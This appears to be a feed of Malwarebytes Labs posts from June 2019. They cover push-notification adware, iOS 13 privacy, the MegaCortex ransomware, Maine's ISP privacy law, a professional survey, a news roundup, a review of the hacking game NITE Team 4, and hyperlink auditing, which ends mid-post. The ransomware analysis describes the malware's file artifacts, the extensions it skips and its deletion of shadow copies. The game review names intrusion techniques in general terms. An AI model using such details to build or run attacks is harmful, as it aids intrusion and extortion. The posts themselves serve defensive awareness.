Techie Feeds

Adware and PUPs families add push notifications as an attack vector

Malwarebytes - Thu, 06/13/2019 - 18:36

Some existing families of potentially unwanted programs and adware have added browser push notifications to their weapons arsenal. Offering themselves up as browser extensions on Chrome and Firefox, these threats pose as useful plugins then haggle users with notifications.

A family of search hijackers

The first I would like to discuss is a large family of Chrome extensions that were already active as search hijackers, but have now added a notifications service from a provider hailing from a domain blocked for fraud by Malwarebytes. What that means is you can now expect browser notifications inviting you to come gamble at an online casino or advertisements selling you get-rich schemes that use pictures of celebrities to gain your trust.

This family is detected under the PUP.Optional umbrella, meaning that Malwarebytes flags them for misconduct but recognizes they offer some kind of functionality and are upfront about the fact that they will change your search settings. The third part of Malwarebytes’ detection name usually refers to the name of the extension. So this one is called PUP.Optional.StreamAll.

The extensions in this family are search hijackers—they redirect users to Yahoo! search results when searching from the address bar. The websites behind all the extensions in this family are presented in three different styles that are completely interchangeable:

Version 1 is a basic design kindly guiding you through the steps of installing the Chrome extension.

Version 2 shows a circle that fills with color until it reaches 100 percent and then tells you it is ready to install the extension.

Version 3 is a bit more “in your face” and lets you know you really shouldn’t miss out on this extension. It does come in a few slightly different color schemes.

The three websites posted above all lead to StreamAll, the same Chrome extension that I have used as an example for this family. In fact, they all redirect to this extension in Chrome’s web store at some point:

A stunning lot of users, which never ceases to amaze me.

Another thing the members of this family have in common is a “thank you” screen after installing one of their extensions, already busy pushing promotional deals. This one has a blue background but can also be fully white.

Their offer to receive notifications is made as soon as you reach one of their sites:

These prompts have also been added to member sites of this family that didn’t promote push notifications earlier on.

If you accept this offer you can find the resulting permission in the Settings menu > click on Advanced > under Privacy and Security > select Site settings > select Notifications.

The number of extensions in this family is rather large, but here is a list of removal guides I created for the most active ones at the moment of writing:

By active I mean they are being heavily promoted by some of the popular ad-rotators. To achieve this, they are probably paying a pretty penny and you can be sure they want to make good on that—at your expense.

A Facebook spammer

The second threat family I want to discuss is into far more serious business. This family of Firefox extensions is detected by Malwarebytes as Trojan.FBSpammer.

These extensions can be found at sites that try to convince users they need a Flash player update.

Prompts and links everywhere. What to do first?

They also ask for permission to send you notifications and—just like StreamAll—they use a provider that is blocked by Malwarebytes for fraud. But in this case, annoying push notifications are the least of users’ worries. As our friends at BleepingComputer figured out, this extension checks users’ Facebook connection and, if the user is logged in, the extension will join some Facebook groups on their behalf and start spamming them.

The extension performs a check to see whether the user is connected to Facebook every two seconds. The extension adds users to some Facebook groups if they are logged in. Then it fetches a campaign and starts spamming those groups in the user’s name. Lesson learned

While browser push notifications can be annoying, they are easy to resolve, as I explained in detail in my blog Browser push notifications: a feature asking to be abused. But we have seen from the examples above that there are worse things.

Choose carefully which extensions you decide to install, as well as which programs you allow to send push notifications. The extensions in these cases are up to no good—especially the Trojan that will give your Facebook reputation a quick shove into the cellar. And if you have trouble determining which extensions are benign and which are taking advantage of users, you can always count on Malwarebytes to point you in the right direction.

Stay safe, everyone!

The post Adware and PUPs families add push notifications as an attack vector appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Apple iOS 13 will better protect user privacy, but more could be done

Malwarebytes - Wed, 06/12/2019 - 16:42

Last week, Apple introduced several new privacy features to its latest mobile operating system, iOS 13. The Internet, predictably, expressed doubt, questioning Apple’s oversized influence, its exclusive pricing model that puts privacy out of reach for anyone who can’t drop hundreds of dollars on a mobile phone, and its continued, near-dictatorial control of the App store, which can, at a moment’s notice, change the rules to exclude countless apps.

At Malwarebytes, we sought to answer something different: Do the new iOS features actually provide meaningful privacy protections?

The short answer from multiple digital rights and privacy advocates is: “Yes, but…”

For example: Yes, but Apple’s older phones should not be excluded from the updates. Also: Yes, but Apple’s competitors are not likely to follow. And more broadly: Yes, but Apple is giving users a convenient solution that does not address a core problem with online identity.

Finally: Yes, but Apple can go further.

Apple’s new single sign-on feature

At Apple’s WWDC19 conference in San Jose last week, Senior Vice President of Software Engineering Craig Federighi told audience members that the latest iOS would give Apple users two big privacy improvements: better protection when signing into third-party services and apps, and more options to restrict location tracking.

Apple’s Single Sign-On (SSO) option will allow users to sign into third-party platforms and apps by using their already-created Apple credentials. Called “Sign in with Apple,” Federighi described the feature not so much as a repeat of similar features provided by competitors Google and Facebook, but as a response.

Standing before a projected display of two separate blue rectangles, one reading “Sign in with Facebook,” the other “Sign in with Google,” Federighi told the audience, “We’ve all seen buttons like this.”

While convenient, Federighi said, these features can also compromise privacy, as “your personal information sometimes gets shared behind the scenes, and these logins can be used to track you.” Behind Federighi, the presentation revealed all the types of information that get shuffled around without a user’s full understanding: Full names, gender, email addresses, events attended, locations visited, hometown, social posts, and shared photos and videos.

Federighi said “Sign in with Apple” locks that data dispersal down.

“Sign in with Apple” lets Apple users log into third-party apps and services by using the Face ID or Touch ID credentials created on their device. The SSO feature also gives Apple users the option to provide third parties with “relay” email addresses—randomly-generated email addresses created by Apple that serve as forwarding addresses, giving users the option to keep private their personal email address while still receiving promotional deals from a company or service. Further, relay addresses will not be repeated, and Apple will generate a new relay for each new platform or app.

Apple iOS 13 gives users the option to both share and hide their email from third-party apps when utilizing the company’s single sign-on feature. Courtesy: Apple

Privacy advocates welcomed the feature but warned about over-reliance on Apple as the one true purveyor of privacy.

“Apple’s new sign-in service is definitely a step in the right direction, but it’s important to understand who it’s protecting you from,” said Gennie Gebhart, associate director of research at Electronic Frontier Foundation. “In short, this kind of feature protects you from all sorts of scary third parties but does not necessarily protect you from the company offering it—in this case, Apple.”

Apple has scored positively with EFF’s annual “Who Has Your Back” report, which, for years, evaluated major tech companies for their willingness to fight overbroad, invasive government requests for user data.

But protecting user data from government requests and protecting it from corporate surveillance are different things.

Luckily, Gebhart said, Apple has promised not to use the information it gleans from its SSO feature to track user activity or build profiles from online behavior. But, Gebhart said, the same can’t be assumed from other big tech companies including Google and Facebook.

“[I]t’s important to remember for other SSO services like Facebook’s and Google’s that, even if they implement cool privacy-protective features like Apple has, that won’t necessarily protect you from Facebook or Google tracking your activity,” Gebhart said.

As to whether those companies will actually follow in Apple’s footsteps, Nathalie Maréchal, a senior research analyst at Ranking Digital Rights, seems doubtful, as those competitors rely on entirely different business models.

“Google, Apple’s main competitor in the smartphone market, relies on pervasive data collection at a massive scale not only to sell advertising, but also to train the algorithms that power its products, such as Google Maps,” Maréchal said. “That’s why Google collects as much data as it possibly can: that data is the raw material for its products and services. I don’t see Google shifting to a model where it collects as little information as possible—as Apple says it does—anytime soon.”

That said, Maréchal still commended Apple for offering relay email addresses in its SSO feature.

“This makes the process much more user-friendly, and makes it even harder for data brokers and advertising networks to connect all of someone’s online activity and create a detailed file about them,” Maréchal said.

Yet another researcher, who said it was good to see Apple taking “practical steps” to protect online identities, warned about a larger problem: The increased dependence on a user’s identity as the de facto credential for accessing all sorts of online services and platforms.

“We are seeing more and more websites and apps pushing us to identify ourselves; while sometimes this may be appropriate, it comes along with dangers,” said Tom Fisher, a researcher at Privacy International. “It can be a tool for tracking people across sessions, for instance.”

Fisher continued: “There’s a need for more thought not only on how identification systems can protect people’s privacy, but also when it is appropriate to ask people to identify themselves at all.”

Apple’s new option for location privacy

Apple’s second big feature will give its users the option to more closely manage how their location is tracked by various third-party apps.

With the update to iOS 13, users can choose to share their location “just once” with an app. That means that, if users choose, any service that requests location information—whether it be Yelp when recommending nearby restaurants, Uber when finding nearby drivers, or Fandango when locating nearby movie theaters—will be allowed to access that information just once, and every subsequent request for location information must be approved by the user on an individual basis.

Maréchal called this an important development. She said many apps that request location information provide convenient services for users, and users should have the option to choose between that convenience and that potential loss of privacy. That decision, she said, is unique to each user.

“That’s a very contextual decision and I’m glad to hear that Apple is giving its users more nuanced options than simply ‘on,’ ‘off,’ or ‘only when the app is in use,’” Maréchal said. “For example, I might not want to share my location with Yelp while checking opening hours for a business in my home city, because the privacy trade-off isn’t worth it, and then might share my location while traveling the following week because I don’t know the city I’m visiting well enough to know how far a restaurant is from me.”

Further steps?

When interviewed for this piece, every researcher agreed: Apple’s newest features provide simple, easy-to-use options that can leave users more informed and more in control of their online privacy.

However, another response came up more than once: Apple can—and should—go further.

These responses are not unusual, and, in fact, they follow in the footsteps of all advocacy work, particularly in online privacy. Earlier this year, it was Mozilla, the privacy-forward, nonprofit developer of the web browser Firefox, that asked Apple to do better by its users in protecting them from invasive online tracking. Similarly, it is privacy advocates and researchers who have the most thought-out ideas on protecting user privacy. These researchers had a few ideas for Apple.

First, Maréchal said, Apple should provide “transparency” reports—the way it already does for the government requests it receives for user data—that disclose how third-party apps collect Apple users’ information. She said Apple’s marketing tagline (“What happens on your iPhone, stays on your iPhone”) is only true for the data Apple itself collects, “but it’s not true of data collected by third party apps.”

A Washington Post article last month revealed this to an alarming degree:

“On a recent Monday night, a dozen marketing companies, research firms and other personal data guzzlers got reports from my iPhone. At 11:43 p.m., a company called Amplitude learned my phone number, email and exact location. At 3:58 a.m., another called Appboy got a digital fingerprint of my phone. At 6:25 a.m., a tracker called Demdex received a way to identify my phone and sent back a list of other trackers to pair up with.”

Fisher raised a separate issue regarding Apple’s security updates: Who gets left behind? At such a high price point for the devices (The oldest iPhone model for sale on Apple’s website that is iOS 13 compatible, the Apple iPhone 7, starts at $449), Fisher said, “What happens to people who can’t afford Apple’s expensive products: Are they then left only with access to more invasive ways of identifying themselves?”

Another one of Maréchal’s suggestions could address that problem.

“I would also like some clarity about how long a new iPhone will be guaranteed to receive software updates, as well as a commitment to providing security updates specifically for at least five years,” Maréchal said. “Given how expensive new iPhones can be, customers should know how long the device will be safe to use before they purchase it.”

While this idea does not fix Fisher’s concerns, it at least gives users a better understanding about what they can expect for their own privacy years later. Any company’s decision to put users in more control of their privacy rights is a decision we can sign onto.

The post Apple iOS 13 will better protect user privacy, but more could be done appeared first on Malwarebytes Labs.

Categories: Techie Feeds

MegaCortex continues trend of targeted ransomware attacks

Malwarebytes - Wed, 06/12/2019 - 16:03

MegaCortex is a relatively new ransomware family that continues the 2019 trend of threat actors developing ransomware specifically for targeted attacks on enterprises. While GandCrab apparently shut its doors, several other bespoke, artisanal ransomware families have taken its place, including RobinHood, which shut down the city of Baltimore, Troldesh, and CrySIS/Dharma.

Detected by Malwarebytes as Ransom.MegaCortex, MegaCortex saw a spike in business detections in late May and has since slowed down to a trickle, following a similar trend as its Troldesh and CrySIS forebearers.

Our anti-ransomware technology detected Ransom.MegaCortex even before defintions were added.


The methods of distribution for MegaCortex are still not completely clear, but there are indications that the ransomware is dropped on compromised computers by using Trojan downloaders. Once a corporate network has been compromised, the attackers try to gain access to a domain controller and spread across the entire network from there.

Suspected Trojans that might be responsible for the distribution of MegaCortex are Qakbot aka Qbot, Emotet, and Rietspoof. Rietspoof is a multi-stage malware that spreads through instant messaging programs.


Before the actual ransomware process starts, several tools and scripts are deployed to disable certain security processes and attempt to gain access to the domain controller so the ransomware can be distributed across the network.

Once the ransomware process is activated, it creates these files:

  • ********.log
  • ********.tsv
  • ********.dll

The ******** are eight random characters that are identical for the three files on the affected system. These names are also mentioned in the ransom note called !!!_READ_ME_!!!.txt.

The ransom note, the log file, and the tsv file are all located in the root drive. The dll, on the other hand, can be found in the %temp%  folder.

The encrypted files are given the extension .aes128ctr. The encryption routine skips files with the extensions:

  • .aes128ctr
  • .bat
  • .cmd
  • .config
  • .dll
  • .exe
  • .lnk
  • .manifext
  • .mui
  • .olb
  • .ps1
  • .sys
  • .tlb
  • .tmp

The routine also skips the files:

  • desktop.ini
  • ********.tsv
  • ********.log

It also skips all the files and subfolders under %windir%, with the exception of %windir%\temp. In addition, MegaCortex deletes all the shadow copies on the affected system.

After the encryption routine is complete, MegaCortex displays this rather theatrical ransom note, high on drama and low on grammatical correctness.

Remarkable ransom note quotes

Some notable quotes from the ransom note:

  • “All of your computers have been corrupted with MegaCortex malware that has encrypted your files.” So the name MegaCortex comes from the threat actors themselves, as opposed to the security researchers who discovered it. (That is one way to help the industry to use a unified detection name.)
  • “It is critical that you don’t restart or shutdown your computer.” This implies that one of the seeds for the encryption routine will be made irretrievable if the computer gets rebooted.
  • “The software price will include a guarantee that your company will never be inconvenienced by us.” Is this a tell-tale sign about how much granular control the threat actors have over the malware attacks, or just another empty promise made by criminals?
  • “We can only show you the door. You’re the one who has to walk through it.” A reference to The Matrix or a failed fiction writer?

The ransom note also makes clear that the information necessary for the decryption routine is contained in the randomly named tsv file. So, if all the information except the private key is on the infected computer, does that mean there will be a free decryptor soon? That depends on many other factors, but if the cybercriminals used the same private key for each infection, there could be a possible escape on the horizon.

Undoubtedly it will take some reverse engineering to get definitive answers to these questions, but it certainly gives us some clues.


Given that the exact infection vector is as of yet unknown, it is hard to give specific protection advice for this ransomware family. But there are some countermeasures that always apply to ransomware attacks, and they might be useful to repeat here:

  • Scan emails with attachments. Suspicious mails with attachments should not reach the end user without being checked first.
  • User education. Users should be taught to refrain from downloading attachments sent to them via mail or instant messaging without close scrutinization.
  • Blacklisting. Most endpoints do not need to be able to run scripts. In those cases, you can blacklist wscript.exe and maybe other scripting options like Powershell.
  • Update software and systems. Updating your systems and your software can plug up vulnerabilities and keep known exploits at bay.
  • Back up files. Reliable and easy-to-deploy backups can shorten the recovery time.

We are far from knowing everything there is to know about this ransomware, but as we discover new information, we will keep our blog readers updated. In the meantime, it is imperative for enterprises to employ best practices for protecting against all ransomware.

After all, we can only show you the door. You’re the one who has to walk through it.

Stay safe, everyone!

The post MegaCortex continues trend of targeted ransomware attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Maine governor signs ISP privacy bill

Malwarebytes - Tue, 06/11/2019 - 16:57

Less than one week after Maine Governor Janet Mills received one of the nation’s most privacy-protective state bills on her desk, she signed it into law. The move makes Maine the latest US state to implement its own online privacy protections.

The law, which will go into effect July 1, 2020, blocks Internet service providers (ISPs) from selling, sharing, or granting third parties access to their customers’ data unless explicitly given approval by those customers. With the changes, Maine residents now have an extra layer of protection for the emails, online chats, browser history, IP addresses, and geolocation data that is commonly collected and stored by companies like Verizon, Comcast, and Spectrum.

In signing the bill, Governor Mills said the people of Maine “value their privacy, online and off.”

“The Internet is a powerful tool, and as it becomes increasingly intertwined with our lives, it is appropriate to take steps to protect the personal information and privacy of Maine people,” said Governor Mills in a released statement. “With this common-sense law, Maine people can access the Internet with the knowledge and comfort that their personal information cannot be bought or sold by their ISPs without their express approval.”

The bill, titled “An Act to Protect the Privacy of Online Customer Information,” was introduced earlier this year by its sponsor, Democratic state Senator Shenna Bellows. It passed through the Maine Legislature’s Committee on Energy, Utilities, and Technology, and gained approval both in the House of Representatives and the Senate soon after. Given until June 11 to sign the bill into law, Governor Mills moved quick, giving her signature on June 6.

As Maine’s lawmakers worked to review and slightly amend the bill (adding a start date to go into effect), it picked up notable supporters, including ACLU of Maine and GSI Inc., a local, small ISP in the state. In an opinion piece published in Bangor Daily News, GSI’s chief executive and chief operating officer voiced strong support for online privacy, saying that “if people can’t trust the Internet, then the value of the Internet is significantly lessened.”

The Maine State Chamber of Commerce opposed the bill, arguing that a new state standard could confuse Maine residents. The Chamber also said the bill was too weak because it did not extend its regulations to some of the Internet’s most noteworthy privacy threats—Silicon Valley companies, including Facebook and Google.

The ACLU of Maine and the Maine State Chamber of Commerce did not return requests for comment about the Governor’s signing.

Sen. Bellows, in the same statement referenced above, commended Maine’s forward action.

“Mainers need to be able to trust that the private data they send online won’t be sold or shared without their knowledge,” Sen. Shenna said. “This law makes Maine first and best in the nation in protecting consumer privacy online.”

The post Maine governor signs ISP privacy bill appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity pros think the enemy is winning

Malwarebytes - Tue, 06/11/2019 - 15:00

There is a saying in security that the bad guys are always one step ahead of defense. Two new sets of research reveal that the constant cat-and-a-mouse game is wearing on security professionals, and many feel they are losing in the war against cybercriminals.

The first figures are from the Information Systems Security Association (ISSA) and industry analyst firm Enterprise Strategy Group (ESG). The two polled cybersecurity professionals and found 94 percent of respondents believe that cyber adversaries have a big advantage over cyber defenders—and the balance of power is with the enemy. Most think that advantage will eventually pay off for criminals, as 91 percent believe that most organizations are extremely vulnerable, or somewhat vulnerable, to a significant cyberattack or data breach.

This mirrors Malwarebytes’ own recent research, in which 75 percent of surveyed security professionals admitted that they believe they could be breached in the next one to three years.

What’s behind this defeatist mindset?

In a blog post on the ESG/ISSA research, Jon Oltsik, principal analyst at ESG says in part the lack of confidence exists because criminals are well organized, persistent, and have the time to fail and try a new strategy in order to infiltrate a network. Meanwhile, security managers are always busy and always trying to play catch up.

The skills shortage that is impacting the security field is compounding the sense of vulnerability among organizations. ESG found 53 percent of organizations report a problematic shortage of cybersecurity skills, and 63 percent of organizations continue to fall behind in providing an adequate level of training for their cybersecurity professionals.

“Organizations are looking at the cybersecurity skills crisis in the wrong way: It is a business, not a technical, issue,” said ISSA International President Candy Alexander in response to findings. “In an environment of a ‘seller’s market’ with 77 percent of cybersecurity professionals solicited at least once per month, the research shows in order to retain and grow cybersecurity professionals at all levels, business leaders need to get involved by building a culture of support for security and value the function.”

Where do we go from here?

An entirely new perspective on addressing risk mitigation is required to turn this mindset around. As Alexander notes, security is a business issue, and it needs attention at all levels of the organization.

But the research shows it doesn’t get the respect it deserves, as 23 percent of respondents said business managers don’t understand and/or support an appropriate level of cybersecurity. Business leaders need to send a clear message that cybersecurity is a top priority and invest in security tools and initiatives in turn to reflect this commitment.

This approach is well-supported by research. In fact, a recent report from  Deloitte and the Financial Services Information Sharing and Analysis Center (FS-ISAC) finds top-performing security programs have one thing in common: They have the attention of executive and board leadership, which also means security is seen as a priority throughout the organization.

ESG/ISSA makes other recommendations for changing the thinking about security. They include:

CISO elevation: CISOs and other security executives also need an increased level of respect and should be expected to engage with executive management. Regular audience with the board is critical to getting security the visibility it requires organization-wide.

Practical professional development for security pros:  While 93 percent of survey respondents agree that cybersecurity professionals must keep up with their skills, 66 percent claim that cybersecurity job demands often prevent them from taking part in skills development. Other noted certifications do not hold as much value on the job, with 57 percent noting many credentials are far more useful in getting a job than doing a job. The report suggests prioritizing practical skills development over certifications.

Develop security talent from within: Because the skills gap makes hiring talent more challenging, 41 percent of survey respondents said that their organization has had to recruit and train junior personnel rather than hire more experienced infosec professionals. But this is a creative way to deal with a dearth of qualified talent.

The report recommends designing an internal training program that will foster future talent and loyalty. It also suggests casting a wider net beyond IT and finding transferable business skills and cross career transitions will help expand the pool of talent.

While the overall picture appears as though security progress is slow in business, adjustments in approach and prioritization of security can go a long way in raising the program’s profile throughout the organization. With more time, attention, and respect given to security strategy and risk mitigation, defense in the future can be a step ahead instead of woefully behind the cybercriminal.

The post Cybersecurity pros think the enemy is winning appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (June 3 – 9)

Malwarebytes - Mon, 06/10/2019 - 17:30

Last week on Malwarebytes Labs, we rounded up some leaks and breaches, reported about Magecart skimmers found on Amazon CloudFront CDN, proudly announced we were awarded as Best Cybersecurity Vendor Blog at the annual EU Security Blogger Awards, discussed how Maine inches closer to shutting down ISP pay-for-privacy schemes, asked where our options to disable hyperlink auditing had gone, and presented a video game portrayals of hacking: NITE Team 4.

Other cybersecurity news
  • At Infosecurity Europe, a security expert from Guardicore discussed a new cryptomining malware campaign called Nanshou, and why the cryptojacking threat is set to get worse. (Source: Threatpost)
  • A security breach at a third-party billing collections firm exposed the personal and financial data on as many as 7.7 million medical testing giant LabCorp customers. (Source: Cnet)
  • A researcher has created a module for the Metasploit penetration testing framework that exploits the critical BlueKeep vulnerability on vulnerable Windows XP, 7, and Server 2008 machines to achieve remote code execution. (Source: BleepingComputer)
  • Microsoft’s security researchers have issued a warning about an ongoing spam wave that is spreading emails carrying malicious RTF documents that infect users with malware without user interaction, once users open the RTF documents. (Source: ZDNet)
  • The Federal Trade Commission has issued two administrative complaints and proposed orders which prohibit businesses from using form contract terms that bar consumers from writing or posting negative reviews online. (Source:
  • Security researchers have discovered a new botnet that has been attacking over 1.5 million Windows systems running a Remote Desktop Protocol (RDP) connection exposed to the Internet. (Source: ZDNet)
  • Microsoft has deleted a massive database of 10 million images which was being used to train facial recognition systems. The database is believed to have been used to train a system operated by police forces and the military. (Source: BBC news)
  • On Tuesday, the Government Accountability Office (GAO) said that the FBI’s Facial Recognition office can now search databases containing more than 641 million photos, including 21 state databases. (Source: NakedSecurity)
  • Despite sharing a common Chromium codebase, browser makers like Brave, Opera, and Vivaldi don’t have plans on crippling support for ad blocker extensions in their products—as Google is currently planning on doing within Chrome. (Source: ZDNet)
  • Traffic destined for some of Europe’s biggest mobile providers was misdirected in a roundabout path through the Chinese-government-controlled China Telecom on Thursday, in some cases for more than two hours. (Source: ArsTechnica)

Stay safe, everyone!

The post A week in security (June 3 – 9) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Video game portrayals of hacking: NITE Team 4

Malwarebytes - Fri, 06/07/2019 - 16:52

Note: The developers of NITE Team 4 granted the blog author access to the game plus DLC content.

A little while ago, an online acquaintance of mine asked if a new video game based on hacking called NITE Team 4 was in any way realistic, or “doable” in terms of the types of hacking it portrayed (accounting for the necessary divergences from how things would work outside of a scripted, plot-goes-here environment).

The developers, AliceandSmith, generously gave me a key for the game, so I’ve spent the last month or so slowly working my way through the content. I’ve not completed it yet, but what I’ve explored is enough to feel confident in making several observations. This isn’t a review; I’m primarily interested in the question: “How realistic is this?”

What is it?

NITE Team 4 is an attempt at making a grounded game focused on a variety of hacking techniques—some of which researchers of various coloured hats may (or may not!) experience daily. It does this by allowing you full use of the so-called “Stinger OS,” their portrayal of a dedicated hacking system able to run queries and operate advanced hacking tools as you take the role of a computer expert in a government-driven secret organisation.

Is it like other hacking games?

Surprisingly, it isn’t. I’ve played a lot of hacking games through the years. They generally fall into two camps. The first are terrible mini-games jammed into unrelated titles that don’t have any resemblance to “hacking” in any way whatsoever. You know what I’m talking about: They’re the bits flagged as “worst part of the game” whenever you talk to a friend about any form of digital entertainment.

The second camp is the full-fledged hacking game, the type based entirely around some sort of stab at a hacking title. The quality is variable, but often they have a specific look and act a certain way.

Put simply, the developers usually emigrate to cyberpunk dystopia land and never come back. Every hacker cliché in the book is wheeled out, and as for the actual hacking content, it usually comes down to abstractions of what the developer assumes hacking might be like, rather than something that it actually resembles.

In other words: You’re not really hacking or doing something resembling hacking. It’s really just numbers replacing health bars. Your in-game computer is essentially just another role-playing character, only instead of a magic pool you have a “hacking strength meter” or something similar. Your modem is your stamina bar, your health bar is replaced by something to do with GPU strength, and so on.

They’re fun, but it’s a little samey after a while.

Meanwhile, in NITE Team 4: I compromised Wi-Fi enabled billboards to track the path of the potentially kidnapped owner of a mobile phone.

Click to enlarge

I used government tools to figure out the connection between supposedly random individuals by cross referencing taxi records and payment stubs. I figured out which mobile phone a suspect owns by using nearby Wi-Fi points to build a picture of their daily routine.

Click to enlarge

I made use of misconfigured server settings to view ID cards belonging to multiple companies looking for an insider threat.

I performed a Man-in-the-Middle attack to sniff network traffic and made use of the Internet of Things to flag a high-level criminal suspect on a heatmap.

Click to enlarge

If it sounds a little different, that’s because it is. We’re way beyond the old “Press H to Hack” here.

Logging on

Even the title screen forced me to weigh up some serious security choices: Do I allow the terminal to store my account username and password? Will there be in game repercussions for this down the line? Or do I store my fictitious not-real video game login in a text file on my very-real desktop?

Click to enlarge

All important decisions. (If you must know, I wrote the password on a post-it note. I figure if someone breaks in, I have more pressing concerns than a video game login. You’re not hacking my Gibson, fictitious nation state attackers).

Getting this show on the road

Your introduction to digital shenanigans isn’t for the faint of heart. As with many games of this nature, there’s a tutorial—and what a tutorial.

Spread across three sections covering basic terminal operations, digital forensics, and network intrusion, there’s no fewer than 15 specific tutorials, and each of those contains multiple components.

I can’t think of any other hacking-themed game where, before I could even consider touching the first mission, I had to tackle:

Basic command line tools, basic and advanced OSINT (open source intelligence), mobile forensics, Wi-Fi compromise, social engineering via the art of phishing toolkits, MiTM (Man in the Middle), making use of exploit databases, and even a gamified version of the infamous NSA tool Xkeyscore.

When you take part in a game tutorial that suggests users of Kali and Metasploit may be familiar with some aspects of the interface, or happily links to real-world examples of tools and incidents, you know you’re dealing with something that has a solid grounding in “how this stuff actually works.”

Click to enlarge

In fact, a large portion of my time was spent happily cycling through the tutorial sections and figuring out how to complete each mini objective. If you’d told me the entire game was those tutorials, I’d probably have been happy with that.

What play styles are available?

The game is fairly aligned to certain types of Red Team actions, primarily reconnaissance and enumeration. You could honestly just read an article such as this and have a good idea of how the game is expected to pan out. Now, a lot of other titles do this to some degree. What’s novel here is the variety of approaches on offer to the budding hacker.

There are several primary mission types: The (so far) four chapter long main mission story, which seems to shape at least certain aspects based on choices made earlier on. This is where the most…Hollywood?…aspects of the story surrounding the hacking seem to reside. In fairness, they do assign a “real life” rating to each scenario and most of them tend to err on the side of “probably not happening,” which is fair enough.

The second type of mission is the daily bounties, where various government agencies offer you rewards for hacking various systems or gathering intel on specific targets. I won’t lie: The interface has defeated me here, and I can’t figure out how to start one. It’s probably something incredibly obvious. They’ll probably make me turn in my hacker badge and hacker gun.

Last of all—and most interesting—are the real world scenarios. These roughly resemble the main missions, but with the added spice of having to leave the game to go fact finding. You may have to hunt around in Google, or look for clues scattered across the Internet by the game developers.

Each mission comes with a briefing document explaining what you have to do, and from there on in, it’s time to grab what information you can lying around online (for real) and pop your findings back into the game.

Click to enlarge

In keeping with the somewhat less Hollywood approach, the tasks and mission backgrounds are surprisingly serious and the monthly releases seem to follow “what if” stories about current events.

They deal with everything from infiltrating Emannuel Macron’s files (topical!) to tackling methamphetamine shipments in South Korea, and helping to extract missing journalists investigating the internment of religious minorities in China. As I said…surprisingly serious.

Getting your gameface on

Most tasks begin by doing what you’d expect—poking around on the Internet for clues. When hackers want to compromise websites or servers, they often go Google Dorking. This is essentially hunting round in search engines for telltale signs of passwords, or exposed databases, or other things a website or server should keep hidden, but the admin hasn’t been paying enough attention.

The idea in NITE Team 4 is to rummage around for subdomains and other points of interest that should’ve been hidden from sight and then exploit them ruthlessly. Different combinations of search and different tools provided by Stinger OS produce different results.

Once you have half a dozen subdomains, then you begin to fingerprint each one and check for vulnerabilities. As is common throughout the game, you don’t get any sort of step-by-step walkthrough on how to break into servers for real. Many key tasks are missed out because it probably wouldn’t make for an interesting game, and frankly there’s already more than enough here to try and figure out while keeping it accessible to newcomers.

Should you find a vulnerable subdomain, it’s then time to run the custom-made vulnerability database provided by Stinger OS, and then fire up the compromise tool (possibly the most “gamey” part of the process) that involves dragging and dropping aspects of the described vulnerability into the hacking tool and breaking into the computer/server/mobile phone.

From there, the mission usually diverges into aspects of security not typically covered in games. If anything, the nuts and bolts terminal stuff is less of a focus than working out how to exploit the fictitious targets away from your Stinger terminal. It feels a lot more realistic to me as a result.

What else can you do?

Before long, you’ll be trying various combinations of data about targets, and their day-to-day life, in the game’s XKeyscore tool to figure out patterns and reveal more information.

Click to enlarge

You’ll be using one of your VPNs to access a compromised network and use several techniques to crack a password. Maybe you won’t need to do that at all, because the target’s phone you just compromised has the password in plaintext in an SMS they sent their boss. What will you do if the password isn’t a password, but a clue to the password?

Click to enlarge

Once obtained, it might help reveal the location of a rogue business helping an insider threat hijack legitimate networks. How will you take them down? Will you try and break into their server? Could that be a trap? Perhaps you grabbed an email from the business card you downloaded. Is it worth firing up the phishing toolkit and trying to craft a boobytrapped email?

Click to enlarge

Would they be more likely to fall for a Word document or a Flash file? Should the body text resemble an accounting missive, or would a legal threat be more effective?

I hear those IoT smart homes are somewhat vulnerable these days. Anyone for BBQ?

Click to enlarge

…and so on.

I don’t want to give too much away, as it’s really worth discovering these things for yourself.

Hack the planet?

I mentioned earlier that I’d have been happy with just the tutorials to play around in. You’re not going to pop a shell or steal millions from a bank account by playing this game because ultimately it’s just that—a game. You’re dropped into specific scenarios, told to get from X to Y, and then you’re left to your own devices inside the hacker sandbox. If you genuinely want to try and tackle some of the basics of the trade, you should talk to security pros, ask for advice, go to conferences, take up a few courses, or try and grab the regular Humble Hacking Bundles.

Occasionally I got stuck and couldn’t figure out if I was doing something wrong, or the game was. Sometimes it expected you to input something as it presented it to you but didn’t mention you’d need to leave off the “/” at the end. Elsewhere, I was supposed to crack a password but despite following the instructions to the letter, it simply wouldn’t work—until it did.

Despite this, I don’t think I’ve played a game based on hacking with so many diverse aspects to it.

Bottom line: Is it realistic?

The various storyline scenarios are by necessity a little “out there.” You’re probably not going to see someone blowing up a house in Germany via remote controlled Hellfire missile strike anytime soon. But in terms of illustrating how many tools people working in this area use, how they use lateral thinking and clever connections to solve a puzzle and get something done, it’s fantastic. There are multiple aspects of this—particularly where dealing with OSINT, making connections, figuring out who did what and where are concerned—that I recognise.

While I was tying up this blog post, I discovered the developers are producing special versions of it for training. This doesn’t surprise me; I could imagine this has many applications, including making in-house custom security policy training a lot more fun and interesting for non infosec employees.

Is this the best hacking game ever made? I couldn’t possibly say. Is it the most fleshed out? I would say so, and anyone looking for an occasionally tricky gamified introduction to digital jousting should give it a look. I’d have loved something like this when I was growing up, and if it helps encourage teenagers (or anyone else, for that matter) to look at security as a career option, then that can only be a bonus.

The post Video game portrayals of hacking: NITE Team 4 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hyperlink auditing: where has my option to disable it gone?

Malwarebytes - Thu, 06/06/2019 - 16:59

There is a relatively old method that might be gaining traction to follow users around on the world wide web.

Most Internet users are aware of the fact that they are being tracked in several ways. (And awareness is a good start.) In a state of awareness, you can adjust your behavior accordingly, and if you feel it’s necessary, you can take countermeasures.

Which is why we want to bring the practice of link auditing to your attention: to make you aware of its existence, if you weren’t already. For those already in the know, you might be surprised to learn that browsers are taking away your option to disable hyperlink auditing.

What is hyperlink auditing?

Hyperlink auditing is a method for website builders to track which links on their site have been clicked on by visitors, and where these links point to. Hyperlink auditing is sometimes referred to as “pings.” This is because “ping” is the name of the link attribute hyperlink auditing uses to do the tracking.

